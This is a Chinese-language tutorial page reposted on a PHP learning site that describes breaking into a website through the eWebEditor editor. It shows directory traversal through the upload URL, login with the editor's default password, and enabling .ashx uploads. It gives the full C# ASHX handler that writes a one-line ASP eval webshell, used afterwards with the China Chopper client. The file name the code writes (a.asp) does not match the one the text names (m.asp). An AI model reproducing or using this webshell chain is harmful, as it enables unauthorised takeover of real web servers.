网站地图    收藏   

主页 > 后端 > 网站安全 >

突破上传过滤一招,利用ashx - 网站安全 - 自学p

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧,正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。用自动扫描脚本扫描出敏感目录i...

前言:有人已经写过了,突破上传过滤,今天我也碰到了。就当记录一下吧,
正文:有个朋友要我给他检测一个站点,很久都没操作,用来练练手把。
 
用自动扫描脚本扫描出敏感目录
inc/ewebeditor/admin_login.asp
既然有ewebeditor编辑器那就尝试下编辑器漏洞把。
 
/inc/ewebeditor/admin/upload.asp?id=6&d_viewmode=list&dir=../
 
直接遍历来了。
 
使用默认密码登录ewebeditor后台,新添加样式,本想很容易解决。
上传免杀小马
 
加密一句话也是一样的结果。
 
那我们怎么解决之个问题呢-
首先在编辑器样式的上传文件添加ashx后缀
在上传我们的Ashx马。
 
<%@ WebHandler Language="C#" Class="Handler" %> using System; using System.Web; using System.IO; public class Handler : IHttpHandler {
 
    public void ProcessRequest (HttpContext context) {
        context.Response.ContentType = "text/plain";
 
        StreamWriter file1= File.CreateText(context.Server.MapPath("a.asp"));
        file1.Write("<%eval request(\"a\")%>");
        file1.Flush();
        file1.Close();
 
    }
 
    public bool IsReusable {
        get {
            return false;
        }
    }
 
}
 
 
接下来访问http://www.xxx.com/UploadFile/eWebEditor/201329112155838.ashx
 
会在eWebEditor生成一个m.asp文件(一句话木马)
 
用菜刀访问http://www.2cto.com /UploadFile/eWebEditor/m.asp
 
就突破了

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论